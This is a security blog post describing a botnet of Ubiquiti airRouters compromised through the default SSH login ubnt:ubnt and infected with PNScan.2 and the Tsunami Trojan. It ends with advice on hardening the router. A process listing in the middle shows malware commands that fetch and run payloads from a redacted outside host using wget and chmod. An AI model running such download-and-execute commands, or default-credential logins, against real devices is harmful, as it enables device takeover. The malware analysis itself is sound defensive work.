Not so long ago, monitoring attackers in our telnet honeypots helped reveal an interesting botnet composed of ASUS brand home routers. A botnet trying to log into our SSH honeypot running on Turris routers most frequently in the last two weeks is a botnet whose IP addresses, according to Shodan, often have one common characteristic: they respond with cookie AIROS_SESSIONID on port 80. This cookie points at AirOS running on Ubiquiti airRouter. According to data from Shodan, about 20% of attacking IP addresses out of a total of about 6500 can be identified as AirOS due to this cookie. Many addresses, however, come from dynamic pools yet unknown to Shodan.
The botnet is fond of using the login:password combination ubnt:ubnt (we do not have this combination normally permitted at the SSH honeypot and unsuccessful login attempts are not displayed on the website). It is the default combinations for airRouter and obviously, there are still plenty of routers that retain the default settings. Moreover, the SSH port is accessible from the Internet.
So have we purchased an airRouter and waited to see what happens. Just a few minutes passed before attackers tried to log into the router. It was like traveling 10 years back in time, when the Sasser worm was widespread. At the time of its greatest glory, Windows machines were infected before updates could be installed (you could bypass it only via offline installation and patch).
The malware sample is pretty well-known due to its noisiness — it is PNScan.2 and it’s trying to spread far and wide. Shortly after the installation, it starts attacking other machines. Files with a list of IP addresses to attack are characterized by being “pre-scanned”, i.e. the attackers already know that SSH is running on the target machines.
After a while, processes of other Trojan downloaded by PNScan show up, most of them belonging to the malware:
PID USER VSZ STAT COMMAND [...] 902 ubnt 812 R /usr/bin/ 1005 ubnt 272 S /usr 1209 ubnt 3632 S /tmp/.xs/daemon.mips.mod 1210 ubnt 3632 S /tmp/.xs/daemon.mips.mod 1211 ubnt 3632 S /tmp/.xs/daemon.mips.mod 1212 ubnt 3632 S /tmp/.xs/daemon.mips.mod 1213 ubnt 3632 S /tmp/.xs/daemon.mips.mod 1236 ubnt 1972 S sh -c wget -c http://x.x.x.x/wras;chmod 777 wras;./wras; 1239 ubnt 3564 S ./wras 1240 ubnt 3564 S ./wras 1241 ubnt 3564 S ./wras 1248 ubnt 1972 S sh -c wget -c http://x.x.x.x/hsde;chmod 777 hsde;./hsde; 1251 ubnt 3564 S ./hsde 1252 ubnt 3564 S ./hsde 1253 ubnt 3564 S ./hsde 1292 ubnt 1972 S sh -c wget -c http://x.x.x.x/wras;chmod 777 wras;./wras; 1295 ubnt 3564 S ./wras 1296 ubnt 3564 S ./wras 1297 ubnt 3564 S ./wras 1302 ubnt 1972 S sh -c wget -c http://x.x.x.x/hsde;chmod 777 hsde;./hsde; 1305 ubnt 3564 S ./hsde 1306 ubnt 3564 S ./hsde 1307 ubnt 3564 S ./hsde 1368 ubnt 1972 S sh -c wget -c http://x.x.x.x/wras;chmod 777 wras;./wras; 1371 ubnt 3564 S ./wras 1372 ubnt 3564 S ./wras 1373 ubnt 3564 S ./wras 1427 ubnt 816 S /usr/bin/ [...]
Less common Trojan processes displayed as “/usr” and “/usr/bin” belong to the Tsunami Trojan. This disguise is made simply by changing argv , which is striking — why didn’t the attackers choose less suspicious name? However, the result is not surprising: a vulnerable device will not stay untouched on the Internet for too long.
So if you own this kind of router, check out what processes are running on it. And if you are considering buying one, we recommend you to first set it up without the Internet connecting, set a strong password, and if you do not really need it, disable the SSH interface being accessible from the WAN side of the router.